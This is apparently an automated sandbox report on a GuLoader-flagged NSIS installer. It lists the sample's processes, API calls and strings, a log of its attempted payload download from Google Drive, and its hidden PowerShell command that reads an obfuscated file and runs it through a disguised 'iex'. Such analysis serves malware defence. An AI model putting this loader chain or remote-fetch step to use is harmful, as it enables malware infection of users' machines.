2024-12-03 15:42:46 UTC	460	OUT	GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
2024-12-03 15:42:47 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:47 GMT Content-Security-Policy: script-src 'nonce-2x3hlxUn2hfgTaPr_UuFOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC7C-c8H1h2722goJP3tpQ84Ob2Ihon4k1h-1gncRhYz9Ux-A9nVZxj-r2o5LzKC9-ieiHEU64ARlw Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:42:47 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 68 4b 62 37 50 37 46 52 6a 43 46 72 5a 66 68 48 57 34 66 50 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0hKb7P7FRjCFrZfhHW4fPw">*{margin:0;padding:0}html,code{font:15px/22px arial

Target ID:	0
Start time:	10:40:42
Start date:	03/12/2024
Path:	C:\Users\user\Desktop\beNxougDFV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\beNxougDFV.exe"
Imagebase:	0x400000
File size:	525'906 bytes
MD5 hash:	8A678142D7D4BD32F67A17757CC896A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:40:45
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)"
Imagebase:	0xc0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:40:45
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:41:56
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x990000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2594806253.00000000084FA000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.9%
Total number of Nodes:	1290
Total number of Limit Nodes:	31

Executed Functions

Function 004031BB Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 368
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004031E0
GetVersion.KERNEL32 ref: 004031E6
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403219
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403255
OleInitialize.OLE32(00000000), ref: 0040325C
SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403278
GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 0040328D
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\beNxougDFV.exe",00000000,?,00000006,00000008,0000000A), ref: 004032A0
CharNextA.USER32(00000000,"C:\Users\user\Desktop\beNxougDFV.exe",00000020,?,00000006,00000008,0000000A), ref: 004032CB
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033C8
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004033D9
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033E5
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033F9
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403401
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403412
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040341A
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040342E

Part of subcall function 004062C7: GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
Part of subcall function 004062C7: GetProcAddress.KERNEL32(00000000,?), ref: 004062F4

Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C

Part of subcall function 0040377F: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\unshabbily,1033,Mongrelizes31 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Mongrelizes31 Setup: Completed,00000000,00000002,774D3410), ref: 0040386F
Part of subcall function 0040377F: lstrcmpiA.KERNEL32(?,.exe), ref: 00403882
Part of subcall function 0040377F: GetFileAttributesA.KERNEL32(: Completed), ref: 0040388D
Part of subcall function 0040377F: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unshabbily), ref: 004038D6
Part of subcall function 0040377F: RegisterClassA.USER32(00422EA0), ref: 00403913

Part of subcall function 004036A5: CloseHandle.KERNEL32(000002D8,004034DC,?,?,00000006,00000008,0000000A), ref: 004036B0

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004034DC
ExitProcess.KERNEL32 ref: 004034FD
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040361A
OpenProcessToken.ADVAPI32(00000000), ref: 00403621
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403639
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403658
ExitWindowsEx.USER32(00000002,80040002), ref: 0040367C
ExitProcess.KERNEL32 ref: 0040369F

Part of subcall function 0040564B: MessageBoxIndirectA.USER32(00409218), ref: 004056A6

Strings

C:\Users\user\Desktop, xrefs: 0040352F, 00403534, 00403560
1033, xrefs: 00403429
"C:\Users\user\Desktop\beNxougDFV.exe", xrefs: 00403293, 00403299, 00403452
NSIS Error, xrefs: 0040327E
\Temp, xrefs: 004033DF
.tmp, xrefs: 00403524
TEMP, xrefs: 0040340D
Error launching installer, xrefs: 00403494
`KNw, xrefs: 00403406
SeShutdownPrivilege, xrefs: 00403633
~nsu, xrefs: 00403508
TMP, xrefs: 00403415
C:\Users\user\AppData\Local\Temp\, xrefs: 004033BD, 004033C2, 004033D8, 004033E4, 004033F3, 00403400, 0040340C, 00403414, 0040350D, 0040351E, 00403529, 00403535, 00403542, 00403551, 00403600
", xrefs: 004032F0
C:\Users\user\AppData\Local\unshabbily, xrefs: 004034B9
C:\Users\user\Desktop\beNxougDFV.exe, xrefs: 004035BA
Low, xrefs: 004033FB
C:\Users\user\AppData\Local\unshabbily, xrefs: 004033AD, 004034AE, 00403558, 00403561
UXTHEME, xrefs: 0040320D, 00403212, 00403218

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Process$ExitFileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
String ID: "$"C:\Users\user\Desktop\beNxougDFV.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unshabbily$C:\Users\user\AppData\Local\unshabbily$C:\Users\user\Desktop$C:\Users\user\Desktop\beNxougDFV.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KNw$~nsu
API String ID: 3855923921-1321654302
Opcode ID: 41a2d84af2d5407adc1c32c5249e47afef491bae6f079a6a4bd1fd594076673a
Instruction ID: af4360d81dc256b8c9424dc56f1358f7fe08c6a718ebf40f6c8df5272bc15683
Opcode Fuzzy Hash: 41a2d84af2d5407adc1c32c5249e47afef491bae6f079a6a4bd1fd594076673a
Instruction Fuzzy Hash: 14C1F5706086427AE7217F719D49B2B3EACEB85306F04457FF541B62E2C77C9A058B2E

Function 00405194 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004051F3
GetDlgItem.USER32(?,000003EE), ref: 00405202
GetClientRect.USER32(?,?), ref: 0040523F
GetSystemMetrics.USER32(00000002), ref: 00405246
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405267
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405278
SendMessageA.USER32(?,00001001,00000000,?), ref: 0040528B
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405299
SendMessageA.USER32(?,00001024,00000000,?), ref: 004052AC
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052CE
ShowWindow.USER32(?,00000008), ref: 004052E2
GetDlgItem.USER32(?,000003EC), ref: 00405303
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405313
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040532C
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405338
GetDlgItem.USER32(?,000003F8), ref: 00405211

Part of subcall function 00404025: SendMessageA.USER32(00000028,?,00000001,00403E55), ref: 00404033

GetDlgItem.USER32(?,000003EC), ref: 00405354
CreateThread.KERNELBASE(00000000,00000000,Function_00005128,00000000), ref: 00405362
CloseHandle.KERNELBASE(00000000), ref: 00405369
ShowWindow.USER32(00000000), ref: 0040538C
ShowWindow.USER32(?,00000008), ref: 00405393
ShowWindow.USER32(00000008), ref: 004053D9
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540D
CreatePopupMenu.USER32 ref: 0040541E
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405433
GetWindowRect.USER32(?,000000FF), ref: 00405453
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040546C
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054A8
OpenClipboard.USER32(00000000), ref: 004054B8
EmptyClipboard.USER32 ref: 004054BE
GlobalAlloc.KERNEL32(00000042,?), ref: 004054C7
GlobalLock.KERNEL32(00000000), ref: 004054D1
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054E5
GlobalUnlock.KERNEL32(00000000), ref: 004054FE
SetClipboardData.USER32(00000001,00000000), ref: 00405509
CloseClipboard.USER32 ref: 0040550F

Strings

Mongrelizes31 Setup: Completed, xrefs: 00405484

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Mongrelizes31 Setup: Completed
API String ID: 590372296-1023628639
Opcode ID: 7ce4c4186a3c3c97c38a9d5959e83e30d411a0e44afbdab31a022d6e1ea2659f
Instruction ID: ffe0cad38c51bf677d90d52cc1be9089f0253f1d9aa70b106fb857e880bd7d9d
Opcode Fuzzy Hash: 7ce4c4186a3c3c97c38a9d5959e83e30d411a0e44afbdab31a022d6e1ea2659f
Instruction Fuzzy Hash: B5A15AB1900208BFDB119FA4DD89AAE7F79FB08355F00403AFA05B62A0C7B55E51DF69

Function 004056F7 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405720
lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405768
lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405789
lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040578F
FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057A0
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040584D
FindClose.KERNEL32(00000000), ref: 0040585E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405704
"C:\Users\user\Desktop\beNxougDFV.exe", xrefs: 004056F7
\*.*, xrefs: 00405762

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\beNxougDFV.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-82508183
Opcode ID: e000b3a5de225f2f8b08f8ac0f3545d1e84fc9896e5a7d05d742c6501ffd0423
Instruction ID: 5202cdaf7196988d1da3935d2d892696f3640e5f60657e92f8c59f35d89726bd
Opcode Fuzzy Hash: e000b3a5de225f2f8b08f8ac0f3545d1e84fc9896e5a7d05d742c6501ffd0423
Instruction Fuzzy Hash: 02519F32800A04BADB217B618C45BAF7B78DF42754F14847BF851761D2D73C8A92DEAE

Function 004065BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e752b298fae306bc4e8e2fa827520659811e589a0f8e200775ab13b43d47c9
Instruction ID: 82117b2ed1b037f842d7e8ec4a077ce5a2ba4b06f200654bc1e2ca7552b06de8
Opcode Fuzzy Hash: 32e752b298fae306bc4e8e2fa827520659811e589a0f8e200775ab13b43d47c9
Instruction Fuzzy Hash: BCF16474D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44

Function 00406232 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(774D3410,00421558,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,004059F8,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 0040623D
FindClose.KERNEL32(00000000), ref: 00406249

Strings

C:\Users\user\AppData\Local\Temp\nsw599B.tmp, xrefs: 00406232

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsw599B.tmp
API String ID: 2295610775-160415898
Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction ID: 7cf403c7a0a34fa6c1bdd97e039e734b9fb45dc45bcdba9fead32da54c1b9644
Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction Fuzzy Hash: 19D0C9329090206BC3106628AC0C84B6A599B953717118A76B56AF12E0D238986286A9

Function 00403B1C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B58
ShowWindow.USER32(?), ref: 00403B75
DestroyWindow.USER32 ref: 00403B89
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA5
GetDlgItem.USER32(?,?), ref: 00403BC6
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BDA
IsWindowEnabled.USER32(00000000), ref: 00403BE1
GetDlgItem.USER32(?,00000001), ref: 00403C8F
GetDlgItem.USER32(?,00000002), ref: 00403C99
SetClassLongA.USER32(?,000000F2,?), ref: 00403CB3
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D04
GetDlgItem.USER32(?,00000003), ref: 00403DAA
ShowWindow.USER32(00000000,?), ref: 00403DCB
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDD
EnableWindow.USER32(?,?), ref: 00403DF8
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0E
EnableMenuItem.USER32(00000000), ref: 00403E15
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2D
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E40
lstrlenA.KERNEL32(Mongrelizes31 Setup: Completed,?,Mongrelizes31 Setup: Completed,00000000), ref: 00403E6A
SetWindowTextA.USER32(?,Mongrelizes31 Setup: Completed), ref: 00403E79
ShowWindow.USER32(?,0000000A), ref: 00403FAD

Strings

Mongrelizes31 Setup: Completed, xrefs: 00403E5A, 00403E60, 00403E69, 00403E77

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Mongrelizes31 Setup: Completed
API String ID: 3282139019-1023628639
Opcode ID: 9cb3074a3fb103a6f3d47e7af7ff2d0ba242536aebbf1ca43321ce8251f687ac
Instruction ID: f34c7ad61b4b1b4f5354d92f7eace51acccef8372a8e2d808ca2954a926f6951
Opcode Fuzzy Hash: 9cb3074a3fb103a6f3d47e7af7ff2d0ba242536aebbf1ca43321ce8251f687ac
Instruction Fuzzy Hash: 65C1B171A04205BBDB216F61ED45E2B7E7CFB45706F40443EF601B11E1C779A942AB2E

Function 0040377F Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062C7: GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
Part of subcall function 004062C7: GetProcAddress.KERNEL32(00000000,?), ref: 004062F4

lstrcatA.KERNEL32(1033,Mongrelizes31 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Mongrelizes31 Setup: Completed,00000000,00000002,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\beNxougDFV.exe",00000000), ref: 004037FA
lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\unshabbily,1033,Mongrelizes31 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Mongrelizes31 Setup: Completed,00000000,00000002,774D3410), ref: 0040386F
lstrcmpiA.KERNEL32(?,.exe), ref: 00403882
GetFileAttributesA.KERNEL32(: Completed), ref: 0040388D
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unshabbily), ref: 004038D6

Part of subcall function 00405E8D: wsprintfA.USER32 ref: 00405E9A

RegisterClassA.USER32(00422EA0), ref: 00403913
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040392B
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403960
ShowWindow.USER32(00000005,00000000), ref: 00403996
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039C2
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039CF
